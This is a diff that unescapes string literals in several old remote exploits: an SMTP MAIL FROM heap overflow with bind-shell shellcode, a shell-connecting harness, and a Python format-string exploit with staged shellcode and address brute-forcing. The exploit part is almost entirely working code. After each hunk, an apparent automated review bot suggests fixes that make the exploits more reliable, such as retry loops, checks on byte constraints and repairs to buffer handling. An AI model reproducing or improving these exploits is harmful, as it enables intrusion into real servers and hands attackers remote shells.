}
|
||||
|
||||
if (listen(s2,0)<0) {
|
||||
err_exit(\"-> listen() error\");
|
||||
err_exit("-> listen() error");
|
||||
}
|
||||
|
||||
wait();
|
||||
close(s1);
|
||||
fprintf(stdout,\"-> Waiting for connection....\\n\");
|
||||
fprintf(stdout,"-> Waiting for connection....\n");
|
||||
|
||||
s1=accept(s2,(struct sockaddr *)&sockadd,&i_len);
|
||||
|
||||
if (s1<0) {
|
||||
err_exit(\"-> accept() error\");
|
||||
err_exit("-> accept() error");
|
||||
}
|
||||
|
||||
alarm(0);
|
||||
|
||||
fprintf(stdout,\"-> Connection from: %s\\n\",inet_ntoa(sockadd.sin_addr));
|
||||
fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr));
|
||||
|
||||
sendcmd(s1);
|
||||
doshell(s1);
|
||||
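Review bot: `wait();` in this hunk is called with no argument; wait() takes an `int *status`, and the call only compiles because no prototype is in scope, so it should be `wait(NULL)` (or capture the status to notice a child whose send() failed). `i_len` passed to `accept(s2,(struct sockaddr *)&sockadd,&i_len);` is declared `int` where accept() expects `socklen_t *`, and `listen(s2,0)` relies on the kernel rounding a zero backlog up; that is fine for a single connect-back but deserves a comment.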
|
@ -446,28 +446,28 @@ int main(int argc, char *argv[]) {
|
|||
else {
|
||||
|
||||
if (send(s1,buf,buffsize,0)<0) {
|
||||
err_exit(\"-> send() error\");
|
||||
err_exit("-> send() error");
|
||||
}
|
||||
|
||||
close(s1);
|
||||
|
||||
fprintf(stdout,\"-> \'Connecting\' mode...\\n\");
|
||||
fprintf(stdout,\"-> Exploit string sent. Waiting for a shell...\\n\");
|
||||
fprintf(stdout,"-> 'Connecting' mode...\n");
|
||||
fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n");
|
||||
sleep(2);
|
||||
|
||||
sockadd.sin_family = AF_INET;
|
||||
sockadd.sin_port = htons(s_port);
|
||||
|
||||
if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) {
|
||||
err_exit(\"-> socket() error\");
|
||||
err_exit("-> socket() error");
|
||||
}
|
||||
|
||||
if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
|
||||
fprintf(stdout,\"-> Exploit failed. Target probably segfaulted...\\n\\n\");
|
||||
fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(stdout,\"-> Connecting to shell at %s:%d\\n\",inet_ntoa(sockadd.sin_addr),s_port);
|
||||
fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port);
|
||||
|
||||
sendcmd(s1);
|
||||
doshell(s1);
|
||||
|
|
|
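Review bot: the failure path `fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n"); exit(0);` in the connecting branch exits with status 0, so a wrapper script cannot tell a failed attempt from a successful shell; use `exit(EXIT_FAILURE)` or `err_exit()` as the other error paths do. The `sleep(2);` before the connect-back is a fixed guess at how long the bind shell takes to come up; retrying the connect a few times with a short delay would be more robust than one attempt after two seconds.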
@ -26,29 +26,29 @@ This BID will be updated when more information becomes available.
|
|||
*
|
||||
* Notes:
|
||||
*
|
||||
* You can\'t have any characters in overflow buffer that isspace() returns true
|
||||
* You can't have any characters in overflow buffer that isspace() returns true
|
||||
* for. The shellcode is clear of them, but if your return address or retloc
|
||||
* has one you gotta figure out another one. My slack box has that situation,
|
||||
* heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I
|
||||
* don\'t have anymore time to BS around with this and make perfect for any and
|
||||
* all, b/c I\'ve got exam to study for and Law and Order:CI is on in an hour.
|
||||
* If the heap you\'re targetting is the same way, then try filling it up using
|
||||
* some other commands. If the GOT you\'re targetting is at such address than
|
||||
* overwrite a return address on the stack. Surely there\'s a way, check out the
|
||||
* source and be creative; I\'m sure there are some memory leaks somewhere you
|
||||
* don't have anymore time to BS around with this and make perfect for any and
|
||||
* all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
|
||||
* If the heap you're targetting is the same way, then try filling it up using
|
||||
* some other commands. If the GOT you're targetting is at such address than
|
||||
* overwrite a return address on the stack. Surely there's a way, check out the
|
||||
* source and be creative; I'm sure there are some memory leaks somewhere you
|
||||
* can use to fill up heap as well.
|
||||
*
|
||||
* You might run into some ugliness trying to automate this for a couple
|
||||
* reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks
|
||||
* for this cookie before calling free(). So you\'re going to need that aligned
|
||||
* for this cookie before calling free(). So you're going to need that aligned
|
||||
* properly unless you can cook up a way to exploit it when it bails out in
|
||||
* xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
|
||||
* maybe you can be clever and do something there). Furthermore I found that
|
||||
* when trying to trigger this multiple times the alignment was different each
|
||||
* time. There are \"definitely\" more reliable ways to exploit this if you take
|
||||
* a deeper look into code which I don\'t have time to do right now. The padding
|
||||
* time. There are "definitely" more reliable ways to exploit this if you take
|
||||
* a deeper look into code which I don't have time to do right now. The padding
|
||||
* parameter controls the alignment and the size of the chunk being allocated.
|
||||
* You\'ll probably have to play with it. Yes that\'s fugly.
|
||||
* You'll probably have to play with it. Yes that's fugly.
|
||||
*
|
||||
* [n00b@crapbox.outernet] ./a.out
|
||||
* Usage: ./a.out < host > < padding > < retloc > < retaddr >
|
||||
|
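Review bot: typos in the unchanged comment lines of this hunk: `targetting` (twice) for `targeting`, and `If the GOT you're targetting is at such address than overwrite a return address on the stack.` should read `then`. More substantively, the comment warns that no byte of the overflow buffer, the return address or `retloc` may satisfy isspace(), and gives `heap is at 0x080d..` as a case where that bites, but the constraint is never enforced in code (parse_args() below accepts any hex value); a one-line check rejecting 0x09 to 0x0d and 0x20 bytes would turn a silent failure into an immediate error.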
@ -67,11 +67,11 @@ This BID will be updated when more information becomes available.
|
|||
*
|
||||
* --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
|
||||
*
|
||||
* --{ Attempting to redefine the meaning of \'definitely\'
|
||||
* --{ Attempting to redefine the meaning of 'definitely'
|
||||
*
|
||||
* --{ Got a shell
|
||||
*
|
||||
* --{ Updating Webster\'s
|
||||
* --{ Updating Webster's
|
||||
* --{ definitely, adv.:
|
||||
* --{ 1. See specious
|
||||
*
|
||||
|
@ -110,7 +110,7 @@ This BID will be updated when more information becomes available.
|
|||
|
||||
#define Z(x, len) memset((x), 0, (len))
|
||||
#define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
|
||||
#define bye(fmt, args...) do{ fprintf(stderr, fmt\"\\n\", ##args);
|
||||
#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args);
|
||||
#exit(EXIT_FAILURE); }while(0)
|
||||
|
||||
|
||||
|
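Review bot: the `bye()` macro in this hunk is broken as stored: `#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args);` ends without a backslash continuation, and the next line `#exit(EXIT_FAILURE); }while(0)` begins with a stray `#`, which the preprocessor rejects as an invalid directive, leaving the `do{` unclosed. The original was almost certainly `... ##args); \` followed by `exit(EXIT_FAILURE); }while(0)`; the unescaping pass should restore that line continuation along with the quotes, otherwise the file still does not compile after this commit.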
@ -119,15 +119,15 @@ This BID will be updated when more information becomes available.
|
|||
#define SHELL_PORT 6969
|
||||
#define NOP 0x90
|
||||
char sc[] =
|
||||
\"\\xeb\\x0e\"\"notexploitable\"
|
||||
\"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x39\\xc6\\x04\\x24\\x02\\x89\\xe6\\xb0\\x02\"
|
||||
\"\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\\x6a\\x01\\x6a\\x02\"
|
||||
\"\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\\x10\\x56\\x50\\x89\\xe1\\xb0\"
|
||||
\"\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\"
|
||||
\"\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\"
|
||||
\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x6b\\x2c\\x60\\xcd\"
|
||||
\"\\x80\";
|
||||
"\xeb\x0e""notexploitable"
|
||||
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb0\x02"
|
||||
"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6a\x02"
|
||||
"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe1\xb0"
|
||||
"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x04\xcd"
|
||||
"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89"
|
||||
"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f"
|
||||
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x60\xcd"
|
||||
"\x80";
|
||||
|
||||
|
||||
/* a dlmalloc chunk descriptor */
|
||||
|
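Review bot: the shell port in `sc[]` is hard-coded in `\x66\xc7\x44\x24\x02\x1b\x39` (`mov word [esp+2], 0x391b`, i.e. the bytes 0x1b 0x39 = 6969 in network order) and must stay in sync with `#define SHELL_PORT 6969` two lines above; a comment tying the two together, or patching the shellcode from SHELL_PORT at runtime, would stop them drifting apart. The blob is also worth annotating for the constraint from the header notes: it contains no isspace() bytes, and `\xb0\x6b\x2c\x60` before the final `\xcd\x80` (`mov al,0x6b; sub al,0x60`) exists precisely to produce execve's syscall number 0x0b without emitting the vertical-tab byte 0x0b, which isspace() matches.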
@ -148,7 +148,7 @@ ssize_t Send(int s, const void *buf, size_t len, int flags)
|
|||
|
||||
n = send(s, buf, len, flags);
|
||||
if(n < 0)
|
||||
die(\"send\");
|
||||
die("send");
|
||||
|
||||
return n;
|
||||
}
|
||||
|
@ -160,7 +160,7 @@ ssize_t Recv(int s, void *buf, size_t len, int flags)
|
|||
|
||||
n = recv(s, buf, len, flags);
|
||||
if(n < 0)
|
||||
die(\"recv\");
|
||||
die("recv");
|
||||
|
||||
return n;
|
||||
}
|
||||
|
@ -176,7 +176,7 @@ int conn(char *host, u_short port)
|
|||
|
||||
hp = gethostbyname(host);
|
||||
if (hp == NULL) {
|
||||
bye(\"gethostbyname failed with error %s\", hstrerror(h_errno));
|
||||
bye("gethostbyname failed with error %s", hstrerror(h_errno));
|
||||
}
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_port = htons(port);
|
||||
|
@ -184,10 +184,10 @@ int conn(char *host, u_short port)
|
|||
|
||||
sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
if (sock < 0)
|
||||
die(\"socket\");
|
||||
die("socket");
|
||||
|
||||
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
|
||||
die(\"connect\");
|
||||
die("connect");
|
||||
|
||||
return sock;
|
||||
}
|
||||
|
@ -201,15 +201,15 @@ void shell(char *host, u_short port)
|
|||
|
||||
sock = conn(host, port);
|
||||
|
||||
printf(\"--{ Got a shell\\n\\n\"
|
||||
\"--{ Updating Webster\'s\\n\"
|
||||
\"--{ definitely, adv.:\\n\"
|
||||
\"--{ 1. See specious\\n\\n\"
|
||||
\"--{ For the linguistically challenged...\\n\"
|
||||
\"--{ specious, adj. :\\n\"
|
||||
\"--{ 1. Having the ring of truth or plausibility but \"
|
||||
\"actually fallacious\\n\"
|
||||
\"--{ 2. Deceptively attractive\\n\\n\"
|
||||
printf("--{ Got a shell\n\n"
|
||||
"--{ Updating Webster's\n"
|
||||
"--{ definitely, adv.:\n"
|
||||
"--{ 1. See specious\n\n"
|
||||
"--{ For the linguistically challenged...\n"
|
||||
"--{ specious, adj. :\n"
|
||||
"--{ 1. Having the ring of truth or plausibility but "
|
||||
"actually fallacious\n"
|
||||
"--{ 2. Deceptively attractive\n\n"
|
||||
);
|
||||
|
||||
FD_ZERO(&rfds);
|
||||
|
@ -219,29 +219,29 @@ void shell(char *host, u_short port)
|
|||
FD_SET(sock, &rfds);
|
||||
|
||||
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
|
||||
die(\"select\");
|
||||
die("select");
|
||||
|
||||
if (FD_ISSET(STDIN_FILENO, &rfds)) {
|
||||
l = read(0, buf, BS);
|
||||
if(l < 0)
|
||||
die(\"read\");
|
||||
die("read");
|
||||
else if(l == 0)
|
||||
bye(\"\\n - Connection closed by user\\n\");
|
||||
bye("\n - Connection closed by user\n");
|
||||
|
||||
if (write(sock, buf, l) < 1)
|
||||
die(\"write\");
|
||||
die("write");
|
||||
}
|
||||
|
||||
if (FD_ISSET(sock, &rfds)) {
|
||||
l = read(sock, buf, sizeof(buf));
|
||||
|
||||
if (l == 0)
|
||||
bye(\"\\n - Connection terminated.\\n\");
|
||||
bye("\n - Connection terminated.\n");
|
||||
else if (l < 0)
|
||||
die(\"\\n - Read failure\\n\");
|
||||
die("\n - Read failure\n");
|
||||
|
||||
if (write(STDOUT_FILENO, buf, l) < 1)
|
||||
die(\"write\");
|
||||
die("write");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
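Review bot: the two reads in this hunk use different sizes, `l = read(0, buf, BS);` for stdin but `l = read(sock, buf, sizeof(buf));` for the socket; if `buf` is a pointer rather than an array inside `shell()`, `sizeof(buf)` is the pointer size and socket output arrives a few bytes at a time, so use `BS` in both places. `if (write(sock, buf, l) < 1) die("write");` also treats a short write as success, and `die("\n - Read failure\n")` hands a string with embedded newlines to perror(), which prints them before the `: strerror` suffix; `bye()` is the better fit for that message.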
@ -255,13 +255,13 @@ int parse_args(int argc, char **argv, char **host, int *npad,
|
|||
|
||||
*host = argv[1];
|
||||
|
||||
if(sscanf(argv[2], \"%d\", npad) != 1)
|
||||
if(sscanf(argv[2], "%d", npad) != 1)
|
||||
return 1;
|
||||
|
||||
if(sscanf(argv[3], \"%x\", retloc) != 1)
|
||||
if(sscanf(argv[3], "%x", retloc) != 1)
|
||||
return 1;
|
||||
|
||||
if(sscanf(argv[4], \"%x\", retaddr) != 1)
|
||||
if(sscanf(argv[4], "%x", retaddr) != 1)
|
||||
return 1;
|
||||
|
||||
return 0;
|
||||
|
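Review bot: parse_args() accepts any values for `retloc` and `retaddr` through `sscanf(argv[3], "%x", retloc)` and `sscanf(argv[4], "%x", retaddr)`, but the header notes above say no byte of either may satisfy isspace(); rejecting 0x09 to 0x0d and 0x20 bytes here, and a negative or oversized `npad` from `sscanf(argv[2], "%d", npad)`, would fail fast instead of building an overflow string the server silently truncates.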
@ -279,35 +279,35 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr)
|
|||
/* read greeting */
|
||||
n = Recv(sock, buf, BS, 0);
|
||||
if(n == 0)
|
||||
bye(\"Server didn\'t even say hi\");
|
||||
bye("Server didn't even say hi");
|
||||
|
||||
/* send HELO */
|
||||
n = snprintf(buf, BS, \"HELO localhost\\r\\n\");
|
||||
n = snprintf(buf, BS, "HELO localhost\r\n");
|
||||
Send(sock, buf, n, 0);
|
||||
Z(buf, BS);
|
||||
n = Recv(sock, buf, BS, 0);
|
||||
if(n == 0)
|
||||
bye(\"Server didn\'t respond to HELO\");
|
||||
bye("Server didn't respond to HELO");
|
||||
|
||||
printf(\"--{ Said HELO\\n\\n\");
|
||||
printf("--{ Said HELO\n\n");
|
||||
|
||||
/*
|
||||
* Build evil chunk overflow. The need to align chunk exactly makes this
|
||||
* not so robust. In my short testing I wasn\'t able to get free() called
|
||||
* directly on an area of memory we control. I\'m sure you can though if you
|
||||
* take some time to study process heap behavior. Note though that you\'ll
|
||||
* not so robust. In my short testing I wasn't able to get free() called
|
||||
* directly on an area of memory we control. I'm sure you can though if you
|
||||
* take some time to study process heap behavior. Note though that you'll
|
||||
* have to fill in the magic cookie field that xmalloc()/xfree() and some
|
||||
* other functions use, so you\'ll still need to have it aligned properly
|
||||
* other functions use, so you'll still need to have it aligned properly
|
||||
* which defeats the whole purpose. This exploits the free() call on the
|
||||
* buffer we overflow, so you have to align the next chunk accordingly.
|
||||
* Anyhow on newest glibc there is a check for negative size field on the
|
||||
* chunk being freed, and program dies if it is negative (the exact
|
||||
* condition is not negative, but it has that effect pretty much, but go
|
||||
* look yourself ;)), So the techniques outlined by gera in phrack don\'t
|
||||
* look yourself ;)), So the techniques outlined by gera in phrack don't
|
||||
* work (being able to point all chunks at our two evil chunks). Check out
|
||||
* most recent glibc code in _int_free() if you haven\'t already.
|
||||
* most recent glibc code in _int_free() if you haven't already.
|
||||
*/
|
||||
memset(pad, \'A\', npad);
|
||||
memset(pad, 'A', npad);
|
||||
|
||||
chunk.dummy = CHUNKSZ;
|
||||
chunk.prevsz = CHUNKSZ;
|
||||
|
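Review bot: `memset(pad, 'A', npad);` at the end of this hunk fills `pad` with a user-supplied length and no bound against the size of `pad`, and nothing in the visible lines NUL-terminates it before it is later formatted with `%s`, unlike the `evil[CHUNKLEN] = 0;` that follows for the chunk; clamp `npad` to `sizeof(pad)-1` and set `pad[npad] = 0`. The long comment is valuable, but its statement that the `_int_free()` size check on the "newest glibc" defeats the technique from gera's phrack article would age better with the glibc version it was observed on.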
@ -318,20 +318,20 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr)
|
|||
evil[CHUNKLEN] = 0;
|
||||
|
||||
/* send the overflow */
|
||||
n = snprintf(buf, BS, \"MAIL FROM:<A!@A:%s> %s%s\\n\", pad, evil, sc);
|
||||
n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
|
||||
Send(sock, buf, n, 0);
|
||||
Z(buf, BS);
|
||||
|
||||
printf(\"--{ Sent MAIL FROM overflow\\n\\n\");
|
||||
printf("--{ Sent MAIL FROM overflow\n\n");
|
||||
|
||||
#define SLEEP_TIME 15
|
||||
setbuf(stdout, NULL);
|
||||
printf(\"--{ Going for shell in \");
|
||||
printf("--{ Going for shell in ");
|
||||
for(n = 0; n < SLEEP_TIME; n++){
|
||||
printf(\"%d \", SLEEP_TIME-n);
|
||||
printf("%d ", SLEEP_TIME-n);
|
||||
sleep(1);
|
||||
}
|
||||
puts(\"\\n\");
|
||||
puts("\n");
|
||||
}
|
||||
|
||||
|
||||
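Review bot: `n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);` followed by `Send(sock, buf, n, 0);` is unsafe once padding plus chunk plus shellcode exceeds `BS`: snprintf() returns the length it would have written, not the bytes actually stored, so Send() then reads `n` bytes past the truncated buffer. Check `n >= BS` and abort (or size `buf` from `npad`) before sending. The fixed `#define SLEEP_TIME 15` countdown is also a guess at when the bind shell is up; a connect loop with a timeout would be more reliable than a single attempt after 15 seconds.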
|
@ -344,21 +344,21 @@ int main(int argc, char **argv)
|
|||
char *host = NULL;
|
||||
|
||||
if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
|
||||
bye(\"Usage: %s < host > < padding > < retloc > < retaddr >\\n\", argv[0]);
|
||||
bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);
|
||||
|
||||
printf(\"--{ Smack 1.oohaah\\n\\n\");
|
||||
printf("--{ Smack 1.oohaah\n\n");
|
||||
|
||||
sock = conn(host, SMTP_PORT);
|
||||
|
||||
printf(\"--{ definitely, adv.:\\n\"
|
||||
\"--{ 1. Having distinct limits\\n\"
|
||||
\"--{ 2. Indisputable; certain\\n\"
|
||||
\"--{ 3. Clearly defined; explicitly precise\\n\\n\"
|
||||
printf("--{ definitely, adv.:\n"
|
||||
"--{ 1. Having distinct limits\n"
|
||||
"--{ 2. Indisputable; certain\n"
|
||||
"--{ 3. Clearly defined; explicitly precise\n\n"
|
||||
);
|
||||
|
||||
sploit(sock, npad, retloc, retaddr);
|
||||
|
||||
printf(\"--{ Attempting to redefine the meaning of \'definitely\'\\n\\n\");
|
||||
printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");
|
||||
|
||||
shell(host, SHELL_PORT);
|
||||
|
||||
|
|
|
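Review bot: `sock = conn(host, SMTP_PORT);` is passed straight to `sploit(sock, npad, retloc, retaddr);` without checking its value; if conn() reports failure by returning -1 (its body is not visible here), the data is written to an invalid descriptor and the countdown and `shell(host, SHELL_PORT);` run anyway. Add `if (sock < 0) bye(...)` or confirm that conn() exits on failure. The multi-line `printf("--{ definitely, adv.:\n" ... );` relies on adjacent string-literal concatenation, which only works with the unescaped form introduced here; the old `\"...\"` text was not compilable C.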
@ -17,18 +17,18 @@ pad = 2
|
|||
#0000000F FFE1 jmp ecx
|
||||
|
||||
# read(4, esp, -1); jmp ecx
|
||||
lnx_readsc = \"\\x31\\xdb\\xf7\\xe3\\xb0\\x03\\x80\\xc3\\x04\\x89\\xe1\\x4a\\xcd\\x80\\xff\\xe1\"
|
||||
lnx_stage_one = \"\\x90\" * (23 - len(lnx_readsc)) + lnx_readsc
|
||||
lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
|
||||
lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
|
||||
# dup2 shellcode(4->0,1,2)
|
||||
lnx_stage_two = \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\xb2\\x3f\\x88\\xd0\\xb3\\x04\"
|
||||
lnx_stage_two += \"\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\"
|
||||
lnx_stage_two = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04"
|
||||
lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
|
||||
# execute /bin/sh
|
||||
lnx_stage_two += \"\\x90\" * 100
|
||||
lnx_stage_two += \"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"
|
||||
lnx_stage_two += \"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\"
|
||||
lnx_stage_two += \"\\xe1\\x8d\\x42\\x0b\\xcd\\x80\"
|
||||
lnx_stage_two += "\x90" * 100
|
||||
lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
|
||||
lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
|
||||
lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"
|
||||
|
||||
targets = [ [ 0 ], [ \"Compiled test platform\", 0x0804c418, 0xbffff9e8 ] ]
|
||||
targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ]
|
||||
|
||||
bruteforce = 0
|
||||
|
||||
|
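Review bot: this change alters behaviour, not just appearance: in Python, `"\\x31\\xdb..."` is a string of literal backslash, `x`, `3`, `1` characters (four characters per intended byte), whereas `"\x31\xdb..."` is the byte 0x31 followed by 0xdb. With the old text `len(lnx_readsc)` would have been 64, so `"\x90" * (23 - len(lnx_readsc))` had a negative repeat count (an empty string) and the stage-one sizing was silently wrong; the corrected line gives `lnx_readsc` its intended 16 bytes, so seven NOPs precede it. These are Python 2 str literals; under Python 3 they become text strings and the later `.send()` calls would need bytes literals (`b"\x31..."`).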
@ -37,13 +37,13 @@ self.host = host
|
|||
self.port = port
|
||||
|
||||
set = 0
|
||||
if(os == \"linux\"):
|
||||
if(os == "linux"):
|
||||
set = 1
|
||||
self.stage_one = self.lnx_stage_one
|
||||
self.stage_two = self.lnx_stage_two
|
||||
|
||||
if(set == 0):
|
||||
print \"Unknown OS\"
|
||||
print "Unknown OS"
|
||||
os._exit()
|
||||
|
||||
self.os = os
|
||||
|
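Review bot: `os._exit()` on the unknown-OS path cannot work: inside this method `os` is the string parameter compared in `if(os == "linux"):`, so `os._exit` raises AttributeError instead of exiting, and even the module function requires a status argument (`os._exit(1)`). Rename the parameter (for example `target_os`) and use `sys.exit(1)` here; `self.os = os` is the only place the value is needed afterwards.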
@ -74,48 +74,48 @@ self.fd.connect((self.host, self.port))
|
|||
|
||||
def exploit(self, where, what):
|
||||
if(not self.fd or self.fd is None): self.connect()
|
||||
self.already_written = len(\'gethostbyname(\')
|
||||
self.already_written = len('gethostbyname(')
|
||||
|
||||
#print \"# of nops: %d\\n\" % (23 - len(self.readsc))
|
||||
#print "# of nops: %d\n" % (23 - len(self.readsc))
|
||||
|
||||
exploit = \"x\" * self.pad
|
||||
exploit = "x" * self.pad
|
||||
self.already_written += self.pad
|
||||
|
||||
exploit += struct.pack(\"<l\", where)
|
||||
exploit += struct.pack(\"<l\", where + 2)
|
||||
exploit += struct.pack("<l", where)
|
||||
exploit += struct.pack("<l", where + 2)
|
||||
self.already_written += 8
|
||||
|
||||
l = self.wl16(what & 0xffff)
|
||||
fill = \"%1$\" + str(l) + \"u\"
|
||||
fill = "%1$" + str(l) + "u"
|
||||
exploit += fill
|
||||
|
||||
exploit += \"%7$hn\"
|
||||
exploit += "%7$hn"
|
||||
|
||||
l = self.wl16(what >> 16)
|
||||
fill = \"%1$\" + str(l) + \"u\"
|
||||
fill = "%1$" + str(l) + "u"
|
||||
exploit += fill
|
||||
|
||||
exploit += \"%8$hn\"
|
||||
exploit += "%8$hn"
|
||||
|
||||
#print \"[*] Format string: (%s) Len: %d\" % (exploit, len(exploit))
|
||||
#print \"[*] Stage 1 length: %d\" % len(self.stage_one)
|
||||
#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
|
||||
#print "[*] Stage 1 length: %d" % len(self.stage_one)
|
||||
|
||||
#time.sleep(5)
|
||||
try:
|
||||
self.fd.send(exploit + self.stage_one + \"\\n\")
|
||||
self.fd.send(exploit + self.stage_one + "\n")
|
||||
self.fd.send(self.stage_two)
|
||||
time.sleep(1)
|
||||
self.fd.send(\"echo spawned; uname -a; id -a;\\n\")
|
||||
print \"Recieved: \" + self.fd.recv(1024)
|
||||
self.fd.send("echo spawned; uname -a; id -a;\n")
|
||||
print "Recieved: " + self.fd.recv(1024)
|
||||
except:
|
||||
self.fd.close()
|
||||
self.fd = None
|
||||
print \"\\tFailed @ 0x%08x\" % what
|
||||
print "\tFailed @ 0x%08x" % what
|
||||
return 0
|
||||
|
||||
remote = telnetlib.Telnet()
|
||||
remote.sock = self.fd
|
||||
print \"[*] You should now have a shell\"
|
||||
print "[*] You should now have a shell"
|
||||
remote.interact()
|
||||
os.exit(0)
|
||||
|
||||
|
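Review bot: `os.exit(0)` after `remote.interact()` does not exist (the module has `os._exit()` and `sys.exit()`), so it raises AttributeError when the interactive session ends; use `sys.exit(0)`. The bare `except:` around the send/recv block catches everything, including KeyboardInterrupt and SystemExit, and reports it as `Failed @ 0x%08x`, which hides real errors during a brute-force run; catch `socket.error` specifically. The de-escaping here is a behavioural fix as well: `"\\n"` would have sent a literal backslash and `n` rather than a newline. Minor: `"Recieved: "` is misspelled.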
@ -125,23 +125,23 @@ r.exploit(where, i)
|
|||
|
||||
def run(self):
|
||||
if(self.bruteforce):
|
||||
print \"Bruteforcing..\"
|
||||
#print \"not implemented yet\"
|
||||
print "Bruteforcing.."
|
||||
#print "not implemented yet"
|
||||
#os._exit(1)
|
||||
for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
|
||||
print \"Trying: 0x%08x\" % i
|
||||
print "Trying: 0x%08x" % i
|
||||
self.force(i, 0xbffffa00, 0xbffff9c0)
|
||||
|
||||
#self.exploit(self.args[1], self.args[2])
|
||||
|
||||
if __name__ == \'__main__\':
|
||||
if __name__ == '__main__':
|
||||
if(len(sys.argv) != 4):
|
||||
print \"%s host [linux] targetid\"
|
||||
print \"- 0 to brute force\"
|
||||
print \"- 1 custom compile\"
|
||||
print "%s host [linux] targetid"
|
||||
print "- 0 to brute force"
|
||||
print "- 1 custom compile"
|
||||
os._exit(0)
|
||||
|
||||
print \"%s-%s-%s\" % (sys.argv[1], sys.argv[2], sys.argv[3])
|
||||
print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
|
||||
r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
|
||||
#r.exploit(0x0804c418, 0xbffff9e8)
|
||||
#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
|
||||
|
|
|
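Review bot: `print "%s host [linux] targetid"` has a `%s` placeholder but no `%` operand, so the literal `%s` is printed instead of the program name; write `print "%s host [linux] targetid" % sys.argv[0]`. In `run()`, `range(0x0804c000, 0x0804d000, 0x100 / 6)` depends on Python 2 integer division (step 42); under Python 3 the step is a float and `range()` raises TypeError, so use `//`. The loop calls `self.force(i, 0xbffffa00, 0xbffff9c0)` while only the commented-out `#self.exploit(...)` shows the single-target path; a one-line comment on what `force` does with its three arguments would help.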
@ -9,7 +9,7 @@
|
|||
* ....
|
||||
* ....
|
||||
* the function re-uses args in the stack before returning so we
|
||||
* can\'t trash them overwriting.
|
||||
* can't trash them overwriting.
|
||||
* Different compiled module [ex. different version of gcc] may require
|
||||
* a different pad value.. (see -g option)
|
||||
*
|
||||
|
